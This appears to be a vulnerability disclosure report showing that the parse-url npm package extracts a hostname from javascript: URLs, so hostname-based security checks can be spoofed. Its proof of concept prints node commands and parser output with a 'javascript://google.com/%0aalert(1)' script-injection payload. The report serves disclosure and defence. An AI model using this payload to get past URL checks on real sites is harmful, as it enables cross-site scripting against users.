hostname spoofing via javascript in ionicabizau/parse-url
Valid
Reported on Mar 4th 2022
Description
If parse-url is used for a security check on a URL, it is dangerous because hostname spoofing through the JavaScript scheme is possible. The same issue occurred in url.parse() of Node.js in 2018, and Node.js acknowledged it as a vulnerability. Node.js patched it, and a CVE was issued after the security release.
sh-3.2$ node -e 'console.log(require("url").parse("javascript://google.com/%0aalert(1)"))'
Url {
protocol: 'javascript:',
slashes: null,
auth: null,
host: null,
port: null,
hostname: null,
hash: null,
search: null,
query: null,
pathname: '//google.com/%0aalert(1)',
path: '//google.com/%0aalert(1)',
href: 'javascript://google.com/%0aalert(1)'
}
sh-3.2$
First of all, the above result is the output of url.parse() in Node.js. When a hostname is passed with the javascript: scheme, it is not recognized as a host; it is absorbed into the path.
Proof of Concept
sh-3.2$ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("javascript://google.com/%0aalert(1)"))'
{
protocols: [ 'javascript' ],
protocol: 'javascript',
port: null,
resource: 'google.com',
user: '',
pathname: '/%0aalert(1)',
hash: '',
search: '',
href: 'javascript://google.com/%0aalert(1)',
query: [Object: null prototype] {}
}
sh-3.2$
But unlike url.parse() in Node.js, parse-url parses out the hostname (google.com is returned as resource), which is what makes a hostname-based check spoofable.
Refer to CVE-2018-12123.
We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. (2 years ago)
We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. (2 years ago)
We have sent a second fix follow up to the ionicabizau/parse-url team. We will try again in 10 days. (2 years ago)
We have sent a third and final fix follow up to the ionicabizau/parse-url team. This report is now considered stale. (a year ago)